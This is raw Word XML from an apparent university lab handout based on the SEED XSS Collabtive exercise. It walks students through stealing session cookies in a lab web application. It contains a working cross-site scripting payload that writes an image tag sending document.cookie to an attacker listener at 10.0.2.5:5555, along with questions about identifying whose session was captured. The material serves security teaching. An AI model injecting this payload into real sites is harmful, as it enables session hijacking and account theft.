          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r w:rsidR="00DB1A96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB1A96" w:rsidRPr="00DB1A96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B7BEA" w:rsidRPr="00DB1A96" w:rsidRDefault="00DB1A96" w:rsidP="00DB1A96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ingle quote</w:t>
      </w:r>
      <w:r w:rsidR="00A36EE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4774E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4774E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4774E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00A4774E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidRPr="00A4774E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1A96" w:rsidRDefault="00DB1A96" w:rsidP="00DB1A96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 w:rsidRPr="00A4774E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You may want to type it instead copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794C26" w:rsidRPr="00DB1A96" w:rsidRDefault="00794C26" w:rsidP="00DB1A96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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need to change the attacker’s IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4490C" w:rsidRDefault="006A7025" w:rsidP="00A62602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2F380A4E" wp14:editId="4DCBD93F">
            <wp:extent cx="4600937" cy="138323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35435" cy="1393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625" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8725"/>
      </w:tblGrid>
      <w:tr w:rsidR="004338D6" w:rsidTr="008B7BEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8725" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004338D6" w:rsidRDefault="00D4490C" w:rsidP="004338D6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4490C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>&lt;script&gt;document.write('&lt;img src=http://10.0.2.5:5555?c=' +escape(document.cookie)+'&gt;')&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004338D6" w:rsidRDefault="004338D6" w:rsidP="005F3A3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4490C" w:rsidRPr="006C2311" w:rsidRDefault="006C2311" w:rsidP="006C2311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servation from the attacker’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4490C" w:rsidRDefault="00D4490C" w:rsidP="00394D4C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01BEF855" wp14:editId="7BE4C024">
            <wp:extent cx="4985191" cy="1384243"/>
            <wp:effectExtent l="0" t="0" r="635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26736" cy="1395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490C" w:rsidRDefault="00EE5F08" w:rsidP="00324B24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5F08" w:rsidRDefault="00EE5F08" w:rsidP="00324B2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the session ID?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5F08" w:rsidRDefault="00175BE2" w:rsidP="00324B2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es the session ID</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00EE5F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to Alice or Bob? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5F08" w:rsidRDefault="00826288" w:rsidP="00324B24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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ow to </w:t>
      </w:r>
      <w:r w:rsidR="00EE5F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">prove </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the session ID belongs to Alice or Bob</w:t>
      </w:r>
      <w:r w:rsidR="00EE5F08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="008D2C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hints: You may use Firebug, which is a plug-in of Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4490C" w:rsidRPr="00394D4C" w:rsidRDefault="00D4490C" w:rsidP="00394D4C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRPr="00977144" w:rsidRDefault="007A05CC" w:rsidP="00D26F31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D26F31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28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:rsidR="00B877EE" w:rsidRPr="005A3F25" w:rsidRDefault="005A3F25" w:rsidP="005A3F25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outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A3F25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.cis.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive/XSS_Collabtive.pdf</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B877EE" w:rsidRPr="005A3F25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5AA6" w:rsidRDefault="000C5AA6" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000C5AA6" w:rsidRDefault="000C5AA6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175BE2" w:rsidRPr="00175BE2">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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5AA6" w:rsidRDefault="000C5AA6" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000C5AA6" w:rsidRDefault="000C5AA6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105D4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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17833C2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A206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E5F9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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C0641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13257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3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65B6D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9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4"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="16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wFAFveuOstAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00615E00"/>
    <w:rsid w:val="00006176"/>
    <w:rsid w:val="000170C8"/>
    <w:rsid w:val="00042B97"/>
    <w:rsid w:val="000532E1"/>
    <w:rsid w:val="00056774"/>
    <w:rsid w:val="00064EDD"/>
    <w:rsid w:val="000A1411"/>
    <w:rsid w:val="000C5AA6"/>
    <w:rsid w:val="000F48DB"/>
    <w:rsid w:val="00175849"/>
    <w:rsid w:val="00175BE2"/>
    <w:rsid w:val="00185B5F"/>
    <w:rsid w:val="00186F68"/>
    <w:rsid w:val="001A482F"/>
    <w:rsid w:val="00225BB3"/>
    <w:rsid w:val="00225EC8"/>
    <w:rsid w:val="00235293"/>
    <w:rsid w:val="0027275F"/>
    <w:rsid w:val="002823B1"/>
    <w:rsid w:val="002A3829"/>
    <w:rsid w:val="002D6A79"/>
    <w:rsid w:val="002E4979"/>
    <w:rsid w:val="002E5842"/>
    <w:rsid w:val="003012FA"/>
    <w:rsid w:val="00303E10"/>
    <w:rsid w:val="00304B1A"/>
    <w:rsid w:val="00307B16"/>
    <w:rsid w:val="0032426B"/>
    <w:rsid w:val="00324B24"/>
    <w:rsid w:val="00344855"/>
    <w:rsid w:val="0038501E"/>
    <w:rsid w:val="00394D4C"/>
    <w:rsid w:val="003E5BC0"/>
    <w:rsid w:val="00411908"/>
    <w:rsid w:val="0043327C"/>
    <w:rsid w:val="004338D6"/>
    <w:rsid w:val="0044590F"/>
    <w:rsid w:val="004747E9"/>
    <w:rsid w:val="004779BB"/>
    <w:rsid w:val="004A2C2C"/>
    <w:rsid w:val="0050513B"/>
    <w:rsid w:val="0051265D"/>
    <w:rsid w:val="00515042"/>
    <w:rsid w:val="0052425F"/>
    <w:rsid w:val="00527399"/>
    <w:rsid w:val="005441FF"/>
    <w:rsid w:val="0054590D"/>
    <w:rsid w:val="005613F5"/>
    <w:rsid w:val="00573CE1"/>
    <w:rsid w:val="00574A55"/>
    <w:rsid w:val="00594AD1"/>
    <w:rsid w:val="005A3DE9"/>
    <w:rsid w:val="005A3F25"/>
    <w:rsid w:val="005D4228"/>
    <w:rsid w:val="005E2847"/>
    <w:rsid w:val="005F3A3A"/>
    <w:rsid w:val="00615E00"/>
    <w:rsid w:val="00623879"/>
    <w:rsid w:val="00625802"/>
    <w:rsid w:val="00652256"/>
    <w:rsid w:val="006542B7"/>
    <w:rsid w:val="00667B0B"/>
    <w:rsid w:val="006A7025"/>
    <w:rsid w:val="006C2311"/>
    <w:rsid w:val="006E378F"/>
    <w:rsid w:val="00703583"/>
    <w:rsid w:val="0074054E"/>
    <w:rsid w:val="00744CA4"/>
    <w:rsid w:val="00756082"/>
    <w:rsid w:val="00770985"/>
    <w:rsid w:val="0079313F"/>
    <w:rsid w:val="00794C26"/>
    <w:rsid w:val="007A05CC"/>
    <w:rsid w:val="007A2F34"/>
    <w:rsid w:val="007A5427"/>
    <w:rsid w:val="007A5CDC"/>
    <w:rsid w:val="007A6980"/>
    <w:rsid w:val="007D5AFE"/>
    <w:rsid w:val="008038ED"/>
    <w:rsid w:val="00826288"/>
    <w:rsid w:val="00860F91"/>
    <w:rsid w:val="00867176"/>
    <w:rsid w:val="00874767"/>
    <w:rsid w:val="00874C7E"/>
    <w:rsid w:val="008A0DD3"/>
    <w:rsid w:val="008B7BEA"/>
    <w:rsid w:val="008D2C09"/>
    <w:rsid w:val="008E20C1"/>
    <w:rsid w:val="00900333"/>
    <w:rsid w:val="00950012"/>
    <w:rsid w:val="00970B29"/>
    <w:rsid w:val="009801A3"/>
    <w:rsid w:val="009B01D0"/>
    <w:rsid w:val="009B491C"/>
    <w:rsid w:val="009C26E5"/>
    <w:rsid w:val="009D7814"/>
    <w:rsid w:val="009E7C2D"/>
    <w:rsid w:val="00A11EA8"/>
    <w:rsid w:val="00A36EE1"/>
    <w:rsid w:val="00A4680C"/>
    <w:rsid w:val="00A4774E"/>
    <w:rsid w:val="00A5001E"/>
    <w:rsid w:val="00A60AC4"/>
    <w:rsid w:val="00A62602"/>
    <w:rsid w:val="00A6328A"/>
    <w:rsid w:val="00A7568A"/>
    <w:rsid w:val="00A809CB"/>
    <w:rsid w:val="00A96CCD"/>
    <w:rsid w:val="00AB11A6"/>
    <w:rsid w:val="00AB2CE6"/>
    <w:rsid w:val="00AC090D"/>
    <w:rsid w:val="00AE4EDB"/>
    <w:rsid w:val="00AE61D9"/>
    <w:rsid w:val="00AF3871"/>
    <w:rsid w:val="00AF6EFD"/>
    <w:rsid w:val="00B0750A"/>
    <w:rsid w:val="00B21540"/>
    <w:rsid w:val="00B229A4"/>
    <w:rsid w:val="00B3207B"/>
    <w:rsid w:val="00B325FF"/>
    <w:rsid w:val="00B372CB"/>
    <w:rsid w:val="00B877EE"/>
    <w:rsid w:val="00B94FA8"/>
    <w:rsid w:val="00BA180E"/>
    <w:rsid w:val="00BA255B"/>
    <w:rsid w:val="00BB5835"/>
    <w:rsid w:val="00BB626F"/>
    <w:rsid w:val="00BD2BF6"/>
    <w:rsid w:val="00C27D10"/>
    <w:rsid w:val="00C30408"/>
    <w:rsid w:val="00C411A5"/>
    <w:rsid w:val="00CB03C3"/>
    <w:rsid w:val="00CB22A5"/>
    <w:rsid w:val="00D072E1"/>
    <w:rsid w:val="00D26F31"/>
    <w:rsid w:val="00D43E04"/>
    <w:rsid w:val="00D4490C"/>
    <w:rsid w:val="00D51BF3"/>
    <w:rsid w:val="00D82EAA"/>
    <w:rsid w:val="00D852BD"/>
    <w:rsid w:val="00DA3249"/>
    <w:rsid w:val="00DA361E"/>
    <w:rsid w:val="00DB1A96"/>
    <w:rsid w:val="00DB684A"/>
    <w:rsid w:val="00DC57E5"/>
    <w:rsid w:val="00DF6DB0"/>
    <w:rsid w:val="00E059D0"/>
    <w:rsid w:val="00E07DB3"/>
    <w:rsid w:val="00E33735"/>
    <w:rsid w:val="00E606BA"/>
    <w:rsid w:val="00EB2649"/>
    <w:rsid w:val="00EB53E8"/>
    <w:rsid w:val="00EE30FE"/>
    <w:rsid w:val="00EE5F08"/>
    <w:rsid w:val="00EF011F"/>
    <w:rsid w:val="00F12F2A"/>
    <w:rsid w:val="00F32F64"/>
    <w:rsid w:val="00F40F3D"/>
    <w:rsid w:val="00F638F2"/>
    <w:rsid w:val="00F76CDE"/>
    <w:rsid w:val="00F9590D"/>
    <w:rsid w:val="00FA6D87"/>
    <w:rsid w:val="00FC0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is.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive/XSS_Collabtive.pdf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xsslabcollabtive.com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8CA190-F0E5-44DC-A889-DEC74C978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9</TotalTime>
  <Pages>6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81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-24T02:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-07T15:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>